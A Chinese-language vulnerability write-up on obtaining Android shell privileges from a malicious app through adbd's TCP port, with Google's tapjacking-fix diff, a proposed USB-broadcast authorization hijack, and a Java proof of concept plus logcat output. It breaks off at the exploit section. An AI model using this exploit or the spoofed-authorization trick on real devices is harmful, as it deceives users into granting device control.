adb由於擁有shell許可權，因此僅在授權PC端後才可使用shell許可權，而通過該漏洞，可以實現在移動端獲取shell許可權，以致於可隨意刪除應用、螢幕截圖等等高許可權操作。不過移動端惡意應用程式必須能夠連線到adbd正在監聽的TCP埠，這就需要應用程式在它的AndroidMainifest.xml中定義INTERNET許可權。

而漏洞作者所用的攻擊方法是構造一個覆蓋視窗，劫持使用者點選，也就是經典的hijack攻擊。Google也據此修復了此種攻擊方式。

但是，我經過嘗試後發現，除了以上構造hijack攻擊視窗外，還可以劫持USB廣播，然後在使用者進行正常的連線電腦操作時，劫持授權介面，使使用者誤導從而進行授權。也即造成新的劫持授權漏洞方案。

影響：

1.png
0×02 原理分析

為了能利用此adb配置漏洞，首先需要adb connect到adbd正在監聽的埠，然後移動端會發起授權驗證視窗，使用者授權，驗證通過後，可使用adb shell命令執行shell許可權操作。

使用adb命令“adb tcpip port”來啟用adbd以監聽TCP埠

adb tcpip 5555

在啟用了USB除錯，且adbd正處於TCP埠監聽的情況下，惡意應用程式可以利用自帶的adb二進位制檔案連線adbd，或者可以實現adb server協議與adbd通訊。如果adb server尚未被裝置授權，則會觸發認證請求並提示使用者驗證並接受RSA公鑰(引用[2])。但此認證框可被覆蓋(Google已經修復)，具體可見參考文章。

分析下diff：

diff --git a/packages/SystemUI/src/com/android/systemui/usb/UsbDebuggingActivity.java b/packages/SystemUI/src/com/android/systemui/usb/UsbDebuggingActivity.java

index f5447a2..329dd99 100644

--- a/packages/SystemUI/src/com/android/systemui/usb/UsbDebuggingActivity.java

+++ b/packages/SystemUI/src/com/android/systemui/usb/UsbDebuggingActivity.java
 


@@ -31,8 +31,12 @@

 import android.os.SystemProperties;

 import android.util.Log;

 import android.view.LayoutInflater;

+import android.view.MotionEvent;

 import android.view.View;

+import android.view.Window;

+import android.view.WindowManager;

 import android.widget.CheckBox;

+import android.widget.Toast;

 import com.android.internal.app.AlertActivity;

 import com.android.internal.app.AlertController;

@@ -48,6 +52,10 @@

     @Override

     public void onCreate(Bundle icicle) {

+        Window window = getWindow();

+        window.addPrivateFlags(WindowManager.LayoutParams.PRIVATE_FLAG_HIDE_NON_SYSTEM_OVERLAY_WINDOWS);

+        window.setType(WindowManager.LayoutParams.TYPE_SYSTEM_DIALOG);

+

         super.onCreate(icicle);

         if (SystemProperties.getInt("service.adb.tcp.port", 0) == 0) {

@@ -79,6 +87,23 @@

         ap.mView = checkbox;

         setupAlert();

+

+        // adding touch listener on affirmative button - checks if window is obscured

+        // if obscured, do not let user give permissions (could be tapjacking involved)

+        //增加了對偽造視窗的認證判定，防止使用者被誤導授權

+        final View.OnTouchListener filterTouchListener = (View v, MotionEvent event) -> {

+            // Filter obscured touches by consuming them.

+            if (((event.getFlags() & MotionEvent.FLAG_WINDOW_IS_OBSCURED) != 0)

+                    || ((event.getFlags() & MotionEvent.FLAG_WINDOW_IS_PARTIALLY_OBSCURED) != 0)) {

+                if (event.getAction() == MotionEvent.ACTION_UP) {

+                    Toast.makeText(v.getContext(),

+                            R.string.touch_filtered_warning,

+                            Toast.LENGTH_SHORT).show();

+                }

+                return true;

+            }

+            return false;

+        };

+        mAlert.getButton(BUTTON_POSITIVE).setOnTouchListener(filterTouchListener);

     }

問題:

1. 貌似只是對偽造視窗進行了防禦，可漏洞難道不是因為TCP埠監聽而造成提權嗎？

2. 那也就是使用者授權後，依舊可以在移動端獲取shell許可權？

結論:

確實可以在移動端獲取到shell許可權
思考

那如果假設能監聽使用者是否連線USB，在使用者進行正常的USB連線PC操作時，劫持授權視窗,即彈出我們的授權，也可以造成使用者誤導授權。
結論:

確實可以構造接收廣播，當USB連線到PC時，會優先彈出我們的授權視窗，從而誤導使用者獲得授權
攻擊思路:

靜態註冊監聽USB連線狀態的廣播，優先順序設定為最高

一旦監聽到連線，啟動後臺service，執行連線命令

此時會優先彈出我們的授權視窗，由於授權視窗並沒有說明來自哪裡的彈窗，見下圖對比，僅僅是RSA指紋不同，即使是技術人員，也很難識別是來自哪裡的授權視窗。

PC端授權視窗

pc.png

apk惡意授權視窗

apk.png
0×03 漏洞利用

試驗環境: Android 4.4.4 Nexus 5

PC端執行

adb tcpip 5555

作者攻擊思路驗證Poc:

private void escalatePrivilege() {

/*

    如果大於android 6.0

    需要使用預編譯的adb可執行二進位制檔案

*/

    try {

        String[] connectCmd = {"adb","connect","127.0.0.1:5555"};

        String[] idCmd = {"adb","shell","id"};

        execCommand(connectCmd);

        execCommand(idCmd);

    } catch (Exception e) {

        Log.d(TAG, "escalatePrivilege: " + e.toString() );

    }

}

private void readData(InputStream inputStream){

    BufferedReader reader = new BufferedReader(new InputStreamReader(inputStream));

    String data ;

    while (true) {

        try {

            data = reader.readLine();

            if(data == null) {

                break;

            }

            Log.d(TAG, "output: " + data);

        } catch (IOException e) {

            e.printStackTrace();

        }

    }

}

private Process execCommand(String[] cmds){

    ProcessBuilder builder = new ProcessBuilder();

    Process execCommandProcess = null;

    builder.command(cmds);

    builder.directory(this.getFilesDir());

    builder.redirectErrorStream(true);

    Map<String, String> env = builder.environment();

    env.put("HOME", this.getFilesDir().toString());

    env.put("TMPDIR", this.getFilesDir().toString());

    try {

        execCommandProcess = builder.start();

        execCommandProcess.waitFor();

        readData(execCommandProcess.getInputStream());

    }catch (InterruptedException e){

        e.printStackTrace();

    } catch (IOException e) {

        e.printStackTrace();

    }

    return execCommandProcess;

}

會彈出USB除錯授權視窗，google已經修復此覆蓋hijack漏洞。

Logcat輸出:

output: connected to 127.0.0.1:5555

output: uid=2000(shell) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1009(mount),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:shell:s0

備註:

可能在實驗的時候，會沒有彈出授權視窗，此時刪除apk，撤銷USB授權後，重啟機器可還原環境。
0×04 思考部分攻擊思路Exp

AndroidManifest.xml 增加USB廣播: